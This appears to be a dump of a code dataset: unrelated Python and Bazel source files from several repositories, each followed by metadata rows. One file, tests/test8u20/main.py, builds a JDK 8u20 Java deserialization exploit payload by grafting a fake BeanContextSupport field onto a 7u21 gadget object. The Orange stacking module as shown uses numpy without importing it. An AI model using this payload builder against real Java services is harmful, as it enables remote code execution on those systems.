from Orange.base import Learner, Model
from Orange.modelling import Fitter
from Orange.classification import LogisticRegressionLearner
from Orange.classification.base_classification import LearnerClassification
from Orange.data import Domain, ContinuousVariable, Table
from Orange.evaluation import CrossValidation
from Orange.regression import RidgeRegressionLearner
from Orange.regression.base_regression import LearnerRegression
# Public API of this module.
__all__ = ['StackedLearner', 'StackedClassificationLearner',
           'StackedRegressionLearner', 'StackedFitter']
class StackedModel(Model):
    """Model that feeds base models' outputs into an aggregating meta model."""

    def __init__(self, models, aggregate, use_prob=True, domain=None):
        """
        :param models: fitted base models
        :param aggregate: fitted meta model over the base models' outputs
        :param use_prob: feed class probabilities (not values) to the aggregate
        :param domain: domain of the original data
        """
        super().__init__(domain=domain)
        self.models = models
        self.aggregate = aggregate
        self.use_prob = use_prob

    def predict_storage(self, data):
        # Build the meta features: class probabilities for classification,
        # plain predictions otherwise.
        if self.use_prob:
            probs = [m(data, Model.Probs) for m in self.models]
            X = np.hstack(probs)
        else:
            pred = [m(data) for m in self.models]
            X = np.column_stack(pred)
        # Target values are unknown at prediction time.
        Y = np.repeat(np.nan, X.shape[0])
        stacked_data = data.transform(self.aggregate.domain)
        with stacked_data.unlocked():
            stacked_data.X = X
            stacked_data.Y = Y
        return self.aggregate(
            stacked_data, Model.ValueProbs if self.use_prob else Model.Value)
class StackedLearner(Learner):
    """
    Constructs a stacked model by fitting an aggregator
    over the results of base models.
    K-fold cross-validation is used to get predictions of the base learners
    and fit the aggregator to obtain a stacked model.
    Args:
        learners (list):
            list of `Learner`s used for base models
        aggregate (Learner):
            Learner used to fit the meta model, aggregating predictions
            of base models
        k (int):
            number of folds for cross-validation
    Returns:
        instance of StackedModel
    """
    __returns__ = StackedModel

    def __init__(self, learners, aggregate, k=5, preprocessors=None):
        super().__init__(preprocessors=preprocessors)
        self.learners = learners
        self.aggregate = aggregate
        self.k = k
        self.params = vars()  # NOTE: captures constructor locals (incl. self)

    def fit_storage(self, data):
        """Cross-validate the base learners, fit the aggregate on their
        out-of-fold predictions, then refit base learners on all data."""
        cv = CrossValidation(k=self.k)
        res = cv(data, self.learners)
        # Meta features: class probabilities for discrete targets,
        # raw predictions for continuous ones.
        if data.domain.class_var.is_discrete:
            X = np.hstack(res.probabilities)
            use_prob = True
        else:
            X = res.predicted.T
            use_prob = False
        # Synthetic domain f1..fn over the meta features, same class variable.
        dom = Domain([ContinuousVariable('f{}'.format(i + 1))
                      for i in range(X.shape[1])],
                     data.domain.class_var)
        stacked_data = data.transform(dom).copy()
        with stacked_data.unlocked_reference():
            stacked_data.X = X
            stacked_data.Y = res.actual
        models = [l(data) for l in self.learners]
        aggregate_model = self.aggregate(stacked_data)
        return StackedModel(models, aggregate_model, use_prob=use_prob,
                            domain=data.domain)
class StackedClassificationLearner(StackedLearner, LearnerClassification):
    """
    Subclass of StackedLearner intended for classification tasks.
    Same as the super class, but has a default
    classification-specific aggregator (`LogisticRegressionLearner`).
    """
    def __init__(self, learners, aggregate=LogisticRegressionLearner(), k=5,
                 preprocessors=None):
        super().__init__(learners, aggregate, k=k, preprocessors=preprocessors)
class StackedRegressionLearner(StackedLearner, LearnerRegression):
    """
    Subclass of StackedLearner intended for regression tasks.
    Same as the super class, but has a default
    regression-specific aggregator (`RidgeRegressionLearner`).
    """
    def __init__(self, learners, aggregate=RidgeRegressionLearner(), k=5,
                 preprocessors=None):
        super().__init__(learners, aggregate, k=k, preprocessors=preprocessors)
class StackedFitter(Fitter):
    """Dispatches to the stacked classification or regression learner
    depending on the problem type."""
    __fits__ = {'classification': StackedClassificationLearner,
                'regression': StackedRegressionLearner}

    def __init__(self, learners, **kwargs):
        kwargs['learners'] = learners
        super().__init__(**kwargs)
if __name__ == '__main__':
    # Smoke test: stack a tree and a kNN on iris (classification)
    # and housing (regression).
    import Orange
    iris = Table('iris')
    knn = Orange.modelling.KNNLearner()
    tree = Orange.modelling.TreeLearner()
    sl = StackedFitter([tree, knn])
    m = sl(iris[::2])
    print(m(iris[1::2], Model.Value))
    housing = Table('housing')
    sl = StackedFitter([tree, knn])
    m = sl(housing[::2])
    print(list(zip(housing[1:10:2].Y, m(housing[1:10:2], Model.Value))))
| 33.503546 | 79 | 0.65834 | 3,722 | 0.787892 | 0 | 0 | 0 | 0 | 0 | 0 | 1,100 | 0.232854 |
17e2be1570ac1669d8bc94548067cec13cd745f2 | 2,049 | py | Python | tests/test8u20/main.py | potats0/javaSerializationTools | eb0291bdd336e28ca5dd9ee86ba6d645f1bf6e8f | [
"Apache-2.0"
] | 124 | 2021-01-21T08:49:20.000Z | 2022-01-23T07:17:30.000Z | tests/test8u20/main.py | potats0/javaSerializationDump | eb0291bdd336e28ca5dd9ee86ba6d645f1bf6e8f | [
"Apache-2.0"
] | 3 | 2021-01-22T03:29:55.000Z | 2021-04-20T06:04:50.000Z | tests/test8u20/main.py | potats0/javaSerializationTools | eb0291bdd336e28ca5dd9ee86ba6d645f1bf6e8f | [
"Apache-2.0"
] | 12 | 2021-01-21T14:09:01.000Z | 2021-11-18T20:13:43.000Z | import yaml
from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock
from javaSerializationTools import ObjectRead
from javaSerializationTools import ObjectWrite
if __name__ == '__main__':
    with open("../files/7u21.ser", "rb") as f:
        a = ObjectRead(f)
        obj = a.readContent()
    # Step 1: add a fake field named 'fake' to the HashSet's superclass.
    signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;")
    fakeSignature = {'name': 'fake', 'signature': signature}
    obj.javaClass.superJavaClass.fields.append(fakeSignature)
    # Build a fake serialized BeanContextSupport object; it must reference
    # the AnnotationInvocationHandler extracted below.
    # Load the class description of BeanContextSupport.
    with open('BeanContextSupportClass.yaml', 'r') as f1:
        BeanContextSupportClassDesc = yaml.load(f1.read(), Loader=yaml.FullLoader)
    # Add the beanContextChildPeer attribute to beanContextSupportObject.
    beanContextSupportObject = JavaObject(BeanContextSupportClassDesc)
    beanContextChildPeerField = JavaField('beanContextChildPeer',
                                          JavaString('Ljava/beans/beancontext/BeanContextChild'),
                                          beanContextSupportObject)
    beanContextSupportObject.fields.append([beanContextChildPeerField])
    # Add the serializable attribute to beanContextSupportObject.
    serializableField = JavaField('serializable', 'I', 1)
    beanContextSupportObject.fields.append([serializableField])
    # Add objectAnnotations data to beanContextSupportObject.
    beanContextSupportObject.objectAnnotation.append(JavaEndBlock())
    AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value
    beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler)
    # Attach beanContextSupportObject through the fake field.
    fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject)
    obj.fields[0].append(fakeField)
    with open("8u20.ser", 'wb') as f:
        o = ObjectWrite(f)
        o.writeContent(obj)
| 43.595745 | 101 | 0.70815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 685 | 0.314364 |
17e369dc9f4c67838ee2db6b83ebfbd5715f6650 | 634 | py | Python | getmysql_threadid.py | wang1352083/mysql_tool | 52f7efc319d2732d780913e7b1d7692fab8e791a | [
"MIT"
] | null | null | null | getmysql_threadid.py | wang1352083/mysql_tool | 52f7efc319d2732d780913e7b1d7692fab8e791a | [
"MIT"
] | null | null | null | getmysql_threadid.py | wang1352083/mysql_tool | 52f7efc319d2732d780913e7b1d7692fab8e791a | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys
base31=pow(2,31)
base32=pow(2,32)
base=0xFFFFFFFF
'''
mysql 中processlist和mysql.log中记录的 threadid不一致.因此做一个转换
from :processlist.threadid -> mysql.log.threadid
'''
def long_to_short(pid):
    """Convert a processlist thread id to the signed 32-bit id in mysql.log.

    Values in [2**31, 2**32) wrap to negative numbers (two's complement).
    Ids wider than 32 bits are first truncated to their low 32 bits and then
    sign-converted. (Previously such wide ids were only masked, skipping the
    signed conversion and yielding values the other branches would have
    reported as negative.)
    """
    masked = pid & 0xFFFFFFFF          # keep the low 32 bits
    if masked < 2147483648:            # < 2**31: fits in a signed int as-is
        return masked
    return masked - 4294967296         # wrap to the negative signed value
def usage(filename):
    # Print usage help and exit (Python 2 print statements).
    print "please use "+filename+ " process_thread"
    print "\teg:"+filename+ " 12345"
    sys.exit(0)
if __name__ == "__main__":
    # Expect exactly one argument: the processlist thread id.
    if len(sys.argv) == 2:
        pid =int(sys.argv[1])
        print long_to_short(pid)
    else:
        usage(sys.argv[0])
| 22.642857 | 52 | 0.635647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 217 | 0.325826 |
17e3cea80522263e8bf2426fc1e739f762bc47da | 1,756 | bzl | Python | mediapipe_api/csharp_proto_src.bzl | laukaho/MediaPipeUnityPlugin | 77ba1a4d2249b8db09b3a1e975a01f6e50d21e33 | [
"MIT"
] | 20 | 2020-07-28T22:21:04.000Z | 2020-10-05T21:43:46.000Z | mediapipe_api/csharp_proto_src.bzl | laukaho/MediaPipeUnityPlugin | 77ba1a4d2249b8db09b3a1e975a01f6e50d21e33 | [
"MIT"
] | 9 | 2020-08-24T00:18:19.000Z | 2020-09-23T08:32:47.000Z | mediapipe_api/csharp_proto_src.bzl | laukaho/MediaPipeUnityPlugin | 77ba1a4d2249b8db09b3a1e975a01f6e50d21e33 | [
"MIT"
] | 4 | 2020-07-28T22:21:06.000Z | 2020-09-15T19:07:20.000Z | # Copyright (c) 2021 homuler
#
# Use of this source code is governed by an MIT-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/MIT.
"""Proto compiler
Macro for generating C# source files corresponding to .proto files
"""
def csharp_proto_src(name, proto_src, deps):
    """Generate C# source code for *.proto

    Declares a genrule that runs protoc with the C# backend and moves the
    generated file next to the declared output.

    Args:
        name: target name
        deps: label list of dependent targets
        proto_src: target .proto file path
    """
    # protoc names the output after the camel-cased proto basename.
    base_name = proto_src.split("/")[-1]
    csharp_out = _camelize(base_name.split(".")[0]) + ".cs"
    outdir = "$(GENDIR)"
    native.genrule(
        name = name,
        srcs = deps + [
            "@com_google_protobuf//:well_known_protos",
        ],
        outs = [csharp_out],
        cmd = """
        mkdir -p {outdir}
        $(location @com_google_protobuf//:protoc) \
            --proto_path=. \
            --proto_path={outdir} \
            --proto_path=$$(pwd)/external/com_google_protobuf/src \
            --proto_path=$$(pwd)/external/com_google_mediapipe \
            --csharp_out={outdir} {}
        mv {outdir}/{outfile} $$(dirname $(location {outfile}))
        """.format(proto_src, outdir = outdir, outfile = csharp_out),
        tools = [
            "@com_google_protobuf//:protoc",
        ],
    )
def _camelize(text):
    """Camel-case *text* for use as a C# file name.

    Non-alphanumeric characters are dropped and treated as word breaks; a
    digit also forces the following character to be capitalized (presumably
    mirroring protoc's C# output naming — verify against protoc behavior).

    The parameter was renamed from `str`, which shadowed the builtin.
    """
    res = ""
    need_capitalize = True
    for s in text.elems():
        if not s.isalnum():
            # Word break: skip the separator, capitalize the next character.
            need_capitalize = True
            continue
        if need_capitalize:
            res += s.capitalize()
        else:
            res += s
        need_capitalize = s.isdigit()
    return res
def _replace_suffix(string, old, new):
    """Returns a string with an old suffix replaced by a new suffix.

    Fixed: the previous `cond and x or y` chain returned the ORIGINAL string
    whenever the replacement result was falsy — e.g. replacing the whole
    string with an empty suffix. The explicit slice upper bound also fixes
    the `string[:-0]` (== empty string) bug when *old* is empty.
    """
    if string.endswith(old):
        return string[:len(string) - len(old)] + new
    return string
| 26.208955 | 71 | 0.607062 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 912 | 0.519362 |
17e620adc33ee30cd11c65a57f46f1da7b3b9897 | 94 | py | Python | bertopic/__init__.py | louisguitton/BERTopic | 0b321678ffe4eab0a28484faf76728f584a94ebd | [
"MIT"
] | 1 | 2021-09-29T12:39:16.000Z | 2021-09-29T12:39:16.000Z | bertopic/__init__.py | louisguitton/BERTopic | 0b321678ffe4eab0a28484faf76728f584a94ebd | [
"MIT"
] | null | null | null | bertopic/__init__.py | louisguitton/BERTopic | 0b321678ffe4eab0a28484faf76728f584a94ebd | [
"MIT"
] | null | null | null | from bertopic._bertopic import BERTopic
# Package version; keep in sync with the distribution metadata.
__version__ = "0.9.1"
# Public API of the package.
__all__ = [
    "BERTopic",
]
| 11.75 | 39 | 0.680851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | 0.180851 |
17e90b462716e5227ea477b2107d03519822cef3 | 2,597 | py | Python | dailyfresh/df_goods/views.py | myworldhere/dailyfresh | 5c4e78095a08442feacce7038818f9978e1e0880 | [
"MIT"
] | null | null | null | dailyfresh/df_goods/views.py | myworldhere/dailyfresh | 5c4e78095a08442feacce7038818f9978e1e0880 | [
"MIT"
] | null | null | null | dailyfresh/df_goods/views.py | myworldhere/dailyfresh | 5c4e78095a08442feacce7038818f9978e1e0880 | [
"MIT"
] | null | null | null | # coding=utf-8
from django.shortcuts import render, redirect
from django.core.paginator import Paginator
from models import *
from haystack.views import SearchView
# Create your views here.
def index(request):
    """Home page: for every category, show the 4 newest and 4 most-clicked goods."""
    category_list = Category.objects.all()
    array = []
    for category in category_list:
        news = category.goodsinfo_set.order_by('-id')[0:4]
        hots = category.goodsinfo_set.order_by('-click')[0:4]
        array.append({'news': news, 'hots': hots, 'category': category})
    context = {'page_style': 'goods', 'title': '首页', 'array': array}
    return render(request, 'df_goods/index.html', context)
def list(request, tid, index, sort):
    """Category listing page with pagination and sorting.

    Args:
        tid: category id.
        index: page number (1-based).
        sort: '1' newest first (default), '2' price descending,
              '3' popularity (clicks) descending.

    NOTE: the name shadows the builtin ``list``, but it is referenced from
    the URLconf as ``views.list``, so it is kept for backward compatibility.
    """
    category = Category.objects.get(id=tid)
    # New-arrivals sidebar.
    news = category.goodsinfo_set.order_by('-id')[0:2]
    if sort == '2':    # sort by price
        order_field = '-price'
    elif sort == '3':  # sort by popularity (click count)
        order_field = '-click'
    else:
        # Default (sort == '1') and any unexpected value: newest first.
        # Previously an unknown sort value left goods_list undefined and
        # raised NameError.
        order_field = '-id'
        sort = '1'
    goods_list = GoodsInfo.objects.filter(category_id=int(tid)).order_by(order_field)
    paginator = Paginator(goods_list, 3)
    page = paginator.page(int(index))
    context = {
        'title': category.title,
        'page_style': 'goods',
        'page': page,
        'news': news,
        'sort': sort,
        'category': category,
        'paginator': paginator,
        'sort_title': ['默认', '价格', '人气']
    }
    return render(request, 'df_goods/list.html', context)
def detail(request, id):
    """Goods detail page: bump the click counter and maintain a
    'recently viewed' cookie holding up to 5 goods ids."""
    goods = GoodsInfo.objects.get(id=id)
    news = goods.category.goodsinfo_set.order_by('-id')[0:2]
    goods.click = goods.click + 1
    goods.save()
    context = {'title': goods.category.title, 'page_style': 'goods', 'goods': goods, 'news': news}
    response = render(request, 'df_goods/detail.html', context)
    # Recently-viewed history, stored as a comma-separated id list.
    records = request.COOKIES.get('records', '')
    if records != '':
        records_array = records.split(',')
        if records_array.count(id) >= 1:  # already recorded: drop the old entry
            records_array.remove(id)
        records_array.insert(0, id)  # most recent first
        if len(records_array) > 5:  # cap the history at 5 entries
            records_array.pop(5)
        records = ','.join(records_array)  # serialize back to a string
    else:
        records = id
    response.set_cookie('records', records)
    return response
# Custom full-text search context.
class MySearchView(SearchView):
    """Haystack SearchView that injects the page title and style into the context."""
    def extra_context(self):
        context = super(MySearchView, self).extra_context()
        context['title'] = '搜索'
        context['page_style'] = 'goods'
        return context
| 32.873418 | 98 | 0.628417 | 219 | 0.079262 | 0 | 0 | 0 | 0 | 0 | 0 | 661 | 0.239233 |
17e98bdd9410e5ff20a99bb45742f5cb653135df | 4,267 | py | Python | guillotina_amqp/tests/mocks.py | vjove/guillotina_amqp | 34f2011ea5547166211e90608c54657d93dde4fc | [
"BSD-3-Clause"
] | 4 | 2018-06-14T12:03:41.000Z | 2020-02-12T17:07:18.000Z | guillotina_amqp/tests/mocks.py | vjove/guillotina_amqp | 34f2011ea5547166211e90608c54657d93dde4fc | [
"BSD-3-Clause"
] | 45 | 2018-11-12T10:57:30.000Z | 2021-05-26T19:13:12.000Z | guillotina_amqp/tests/mocks.py | vjove/guillotina_amqp | 34f2011ea5547166211e90608c54657d93dde4fc | [
"BSD-3-Clause"
] | 4 | 2018-12-19T16:59:04.000Z | 2021-06-20T16:27:43.000Z | import asyncio
import uuid
class MockChannel:
    """Test double for an AMQP channel that simply records every call."""

    def __init__(self):
        # Each entry has the shape {"args": <tuple>, "kwargs": <dict>},
        # appended in call order.
        self.published = []
        self.acked = []
        self.nacked = []

    @staticmethod
    def _record(bucket, args, kwargs):
        # All three recorders share the same storage shape.
        bucket.append({"args": args, "kwargs": kwargs})

    async def publish(self, *args, **kwargs):
        self._record(self.published, args, kwargs)

    async def basic_client_ack(self, *args, **kwargs):
        self._record(self.acked, args, kwargs)

    async def basic_client_nack(self, *args, **kwargs):
        self._record(self.nacked, args, kwargs)
class MockEnvelope:
    """Minimal envelope stand-in: only carries the delivery tag."""

    def __init__(self, uid):
        self.delivery_tag = uid
class MockAMQPChannel:
    """In-memory AMQP channel double backed by the owning protocol's dicts.

    Messages live in ``protocol.queues`` (queue name -> list of message
    dicts); dead-letter targets live in ``protocol.dead_mapping``.
    """

    def __init__(self, protocol):
        self.protocol = protocol
        self.consumers = []          # consumer-loop tasks started by basic_consume
        self.closed = False
        self.unacked_messages = []   # delivered but not yet acked/nacked

    async def basic_qos(self, *args, **kwargs):
        # QoS is irrelevant for the in-memory mock.
        pass

    async def exchange_declare(self, *args, **kwargs):
        # Exchanges are not modelled.
        pass

    async def queue_declare(self, queue_name, *args, **kwargs):
        """Create the queue list and register its dead-letter target, if any."""
        if queue_name not in self.protocol.queues:
            self.protocol.queues[queue_name] = []
        if "arguments" in kwargs:
            arguments = kwargs["arguments"]
            if "x-dead-letter-routing-key" in arguments:
                self.protocol.dead_mapping[queue_name] = arguments[
                    "x-dead-letter-routing-key"
                ]

    async def queue_bind(self, *args, **kwargs):
        # Bindings are not modelled; publish() routes by routing_key directly.
        pass

    async def _basic_consume(self, handler, queue_name):
        # Poll until the channel is closed, draining all pending messages
        # each round and delivering them to *handler*.
        while not self.closed:
            await asyncio.sleep(0.02)
            if queue_name not in self.protocol.queues:
                continue
            else:
                messages = self.protocol.queues[queue_name]
                self.protocol.queues[queue_name] = []
                self.unacked_messages.extend(messages)
                for message in messages:
                    await handler(
                        self,
                        message["message"],
                        MockEnvelope(message["id"]),
                        message["properties"],
                    )

    async def basic_client_ack(self, delivery_tag):
        """Remove and return the unacked message matching *delivery_tag*
        (None when no such message is pending)."""
        for message in self.unacked_messages[:]:
            if delivery_tag == message["id"]:
                self.unacked_messages.remove(message)
                return message

    async def basic_client_nack(self, delivery_tag, multiple=False, requeue=False):
        """Reject a message: requeue it, or move it to its dead-letter queue."""
        message = await self.basic_client_ack(delivery_tag)
        if message:
            if requeue:
                # put back on same queue
                self.protocol.queues[message["queue"]].append(message)
            else:
                # Route to the dead-letter queue declared for the source queue.
                new_queue = self.protocol.dead_mapping[message["queue"]]
                self.protocol.queues[new_queue].append(message)

    async def basic_consume(self, handler, queue_name):
        """Start a background consumer task for *queue_name*."""
        self.consumers.append(
            asyncio.ensure_future(self._basic_consume(handler, queue_name))
        )

    async def publish(
        self, message, exchange_name=None, routing_key=None, properties={}
    ):
        """Append a message dict to the queue named by *routing_key*."""
        # NOTE: mutable default for *properties* kept for byte-compatibility.
        if routing_key not in self.protocol.queues:
            self.protocol.queues[routing_key] = []
        self.protocol.queues[routing_key].append(
            {
                "id": str(uuid.uuid4()),
                "message": message,
                "properties": properties,
                "queue": routing_key,
            }
        )

    async def close(self):
        """Flag the channel closed and give consumer loops time to notice."""
        self.closed = True
        await asyncio.sleep(0.06)
class MockAMQPTransport:
    """No-op transport double; exists so callers can invoke ``close()`` safely."""

    def __init__(self):
        pass  # nothing to set up

    def close(self):
        pass  # nothing to tear down
class MockAMQPProtocol:
    """In-memory AMQP protocol double holding the queues shared by its channels."""

    def __init__(self):
        self.queues = {}        # queue name -> list of pending message dicts
        self.dead_mapping = {}  # queue name -> dead-letter routing key
        self.closed = False
        self.channels = []

    async def channel(self):
        """Create and track a new mock channel bound to this protocol."""
        channel = MockAMQPChannel(self)
        self.channels.append(channel)
        return channel

    async def wait_closed(self):
        # Poll until close() flips the flag, then raise GeneratorExit to
        # mimic the connection task being torn down.
        while not self.closed:
            await asyncio.sleep(0.05)
        raise GeneratorExit()

    async def close(self):
        """Flag the protocol closed and close every tracked channel."""
        self.closed = True
        for channel in self.channels:
            await channel.close()

    async def send_heartbeat(self):
        # Heartbeats are a no-op in tests.
        pass
async def amqp_connection_factory(*args, **kwargs):
    """Drop-in replacement for the AMQP connection factory in tests;
    all arguments are accepted and ignored."""
    return MockAMQPTransport(), MockAMQPProtocol()
| 29.427586 | 83 | 0.574408 | 4,120 | 0.96555 | 0 | 0 | 0 | 0 | 3,487 | 0.817202 | 217 | 0.050855 |
17ea30689ba9d98fd7b8fd672edbe09e38e06775 | 210 | py | Python | foodbot/urls.py | surajpaib/HungerHero | be7c0b77944579f057886b074ba8db83d270ae83 | [
"Apache-2.0"
] | null | null | null | foodbot/urls.py | surajpaib/HungerHero | be7c0b77944579f057886b074ba8db83d270ae83 | [
"Apache-2.0"
] | null | null | null | foodbot/urls.py | surajpaib/HungerHero | be7c0b77944579f057886b074ba8db83d270ae83 | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import url
from . import views
urlpatterns = [
    # Chat-bot webhook endpoint.
    url(r'^bot/', views.webhook, name='bot'),
    # Food-center webhook endpoint.
    url(r'^foodcenter/', views.food_center_webhook, name= 'food'),
    # url(r'^relay/', vi)
]
17ea8bf7616bc3b308a3396c07848b28c8a67621 | 3,874 | py | Python | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/l2vpn/configure.py | CiscoTestAutomation/genielibs | becee8a1a85f4973e00859e3244e2c8fe45a394c | [
"Apache-2.0"
] | 94 | 2018-04-30T20:29:15.000Z | 2022-03-29T13:40:31.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/l2vpn/configure.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 67 | 2018-12-06T21:08:09.000Z | 2022-03-29T18:00:46.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/l2vpn/configure.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 49 | 2018-06-29T18:59:03.000Z | 2022-03-10T02:07:59.000Z | """Common configure functions for bgp"""
# Python
import logging
import re
# Unicon
from unicon.core.errors import SubCommandFailure
log = logging.getLogger(__name__)
def configure_l2vpn_storm_control(
    device, interface, service_instance_id, storm_control
):
    """ Configures storm control under service instance
        Args:
            device('obj'): device to configure
            interface('str'): interface name
            service_instance_id:('int'): service instance id
            storm_control('list'): list of storm control configurations,
                each a dict with keys 'traffic_flow', 'name' and 'val', e.g.
                {'traffic_flow': 'unicast', 'name': 'cir', 'val': 8000}
        Returns:
            N/A
        Raises:
            SubCommandFailure
    """
    log.info(
        "Configuring storm control under service "
        "instance: {} and interface: {}".format(service_instance_id, interface)
    )
    # Assemble the CLI block as one newline-joined string.
    lines = [
        "interface {}\n".format(interface),
        "service instance {} ethernet\n".format(service_instance_id),
    ]
    lines.extend(
        "storm-control {} {} {}\n".format(
            entry["traffic_flow"], entry["name"], entry["val"]
        )
        for entry in storm_control
    )
    try:
        device.configure("".join(lines))
    except SubCommandFailure as e:
        raise SubCommandFailure(
            "Configuration failed for storm control under service "
            "instance: {} and interface: {} with exception: {}".format(
                service_instance_id, interface, str(e)
            )
        )
def configure_l2vpn_vfi_context_vpls(device, vpn_id, pseudowire=None):
    """
        Configures l2vpn vfi context vpls on device
        Args:
            device('obj'): device to configure
            vpn_id('str'): vpn_id to configure
            pseudowire('str', optional): pseudowire members to configure,
                default value is None
        Returns:
            N/A
        Raises:
            SubCommandFailure
    """
    log.info(
        "Configuring l2vpn vfi context vpls on {dev}".format(dev=device.name)
    )
    cmds = ["l2vpn vfi context vpls", "vpn id {vpn}".format(vpn=vpn_id)]
    # Add one member line per pseudowire entry, if any were supplied.
    for member in (pseudowire or []):
        cmds.append("member {attr}".format(attr=member))
    try:
        device.configure(cmds)
    except SubCommandFailure as e:
        raise SubCommandFailure(
            "Configuration failed for l2vpn vfi vpls on "
            "{dev} with exception: {e}".format(
                dev=device.name, e=str(e)
            )
        )
def unconfigure_l2vpn_vfi_context_vpls(device):
    """
        Unconfigures l2vpn vfi context vpls on device
        Args:
            device('obj'): device to configure
        Returns:
            N/A
        Raises:
            SubCommandFailure
    """
    log.info(
        "Unconfiguring l2vpn vfi context vpls on {dev}".format(dev=device.name)
    )
    failure_msg = (
        "Configuration removal failed for l2vpn vfi vpls on "
        "{dev} with exception: {e}"
    )
    try:
        device.configure("no l2vpn vfi context vpls")
    except SubCommandFailure as e:
        raise SubCommandFailure(
            failure_msg.format(dev=device.name, e=str(e))
        )
| 28.485294 | 79 | 0.513681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,270 | 0.585958 |
17ecb3cdae4406d81c58cf487da09197d576b8b9 | 590 | py | Python | MagiSlack/__main__.py | riemannulus/MagiSlack | 3bcb5057ccc0699b2e4b0029f5d1c87e03a70356 | [
"MIT"
] | null | null | null | MagiSlack/__main__.py | riemannulus/MagiSlack | 3bcb5057ccc0699b2e4b0029f5d1c87e03a70356 | [
"MIT"
] | null | null | null | MagiSlack/__main__.py | riemannulus/MagiSlack | 3bcb5057ccc0699b2e4b0029f5d1c87e03a70356 | [
"MIT"
] | null | null | null | from os import environ
from MagiSlack.io import MagiIO
from MagiSlack.module import MagiModule
def hello_world(*args, **kwargs):
    """Demo Slack callback: greet the invoking user by name and display name."""
    name = kwargs['name']
    display_name = kwargs['display_name']
    return "HELLO WORLD! user {}, {}".format(name, display_name)
if __name__ == '__main__':
    print('Magi Start!')
    print('='*30)
    print('MagiModule Initializing.')
    # The Slack API token must be supplied via the environment.
    module = MagiModule.MagiModule(environ['SLACK_API_TOKEN'])
    print('Complete')
    print('='*30)
    print('MagiIO Initializing.')
    io = MagiIO.MagiIO(module)
    print('Complete')
    print('='*30)
    # Register the demo 'hello' command, then start the event loop.
    io.set_callback_func('hello', hello_world)
    io.start()
| 21.851852 | 74 | 0.666102 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 187 | 0.316949 |
17edcea77994ad95b7f15708cbc1815c28e54b7c | 2,234 | py | Python | my_plugins/YouCompleteMe/third_party/ycmd/ycmd/tests/server_utils_test.py | liutongliang/myVim | 6c7ab36f25f4a5e2e1daeab8c43509975eb031e3 | [
"MIT"
] | 2 | 2018-04-16T03:08:42.000Z | 2021-01-06T10:21:49.000Z | my_plugins/YouCompleteMe/third_party/ycmd/ycmd/tests/server_utils_test.py | liutongliang/myVim | 6c7ab36f25f4a5e2e1daeab8c43509975eb031e3 | [
"MIT"
] | null | null | null | my_plugins/YouCompleteMe/third_party/ycmd/ycmd/tests/server_utils_test.py | liutongliang/myVim | 6c7ab36f25f4a5e2e1daeab8c43509975eb031e3 | [
"MIT"
] | null | null | null | # Copyright (C) 2016-2018 ycmd contributors
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import * # noqa
from hamcrest import assert_that, calling, equal_to, raises
from mock import patch
from ycmd.server_utils import GetStandardLibraryIndexInSysPath
from ycmd.tests import PathToTestFile
@patch( 'sys.path', [
  PathToTestFile( 'python-future', 'some', 'path' ),
  PathToTestFile( 'python-future', 'another', 'path' ) ] )
def GetStandardLibraryIndexInSysPath_ErrorIfNoStandardLibrary_test( *args ):
  # With no standard-library directory on the patched sys.path, the lookup
  # must raise RuntimeError with this exact message.
  assert_that(
    calling( GetStandardLibraryIndexInSysPath ),
    raises( RuntimeError,
            'Could not find standard library path in Python path.' ) )
@patch( 'sys.path', [
  PathToTestFile( 'python-future', 'some', 'path' ),
  PathToTestFile( 'python-future', 'standard_library' ),
  PathToTestFile( 'python-future', 'another', 'path' ) ] )
def GetStandardLibraryIndexInSysPath_FindFullStandardLibrary_test( *args ):
  # The 'standard_library' fixture directory sits at index 1 of the patched path.
  assert_that( GetStandardLibraryIndexInSysPath(), equal_to( 1 ) )
@patch( 'sys.path', [
  PathToTestFile( 'python-future', 'some', 'path' ),
  PathToTestFile( 'python-future', 'embedded_standard_library',
                  'python35.zip' ),
  PathToTestFile( 'python-future', 'another', 'path' ) ] )
def GetStandardLibraryIndexInSysPath_FindEmbeddedStandardLibrary_test( *args ):
  # A zipped (embedded) standard library must also be detected, at index 1.
  assert_that( GetStandardLibraryIndexInSysPath(), equal_to( 1 ) )
| 39.192982 | 79 | 0.745748 | 0 | 0 | 0 | 0 | 1,101 | 0.492838 | 0 | 0 | 1,091 | 0.488362 |
17ee2ab39fa3aef85b71231efdccae35147bec91 | 560 | py | Python | spraycharles/utils/notify.py | Tw1sm/passwordpredator | 57e173c68b1dfe89149fc108999f560bf1569cd7 | [
"BSD-3-Clause"
] | null | null | null | spraycharles/utils/notify.py | Tw1sm/passwordpredator | 57e173c68b1dfe89149fc108999f560bf1569cd7 | [
"BSD-3-Clause"
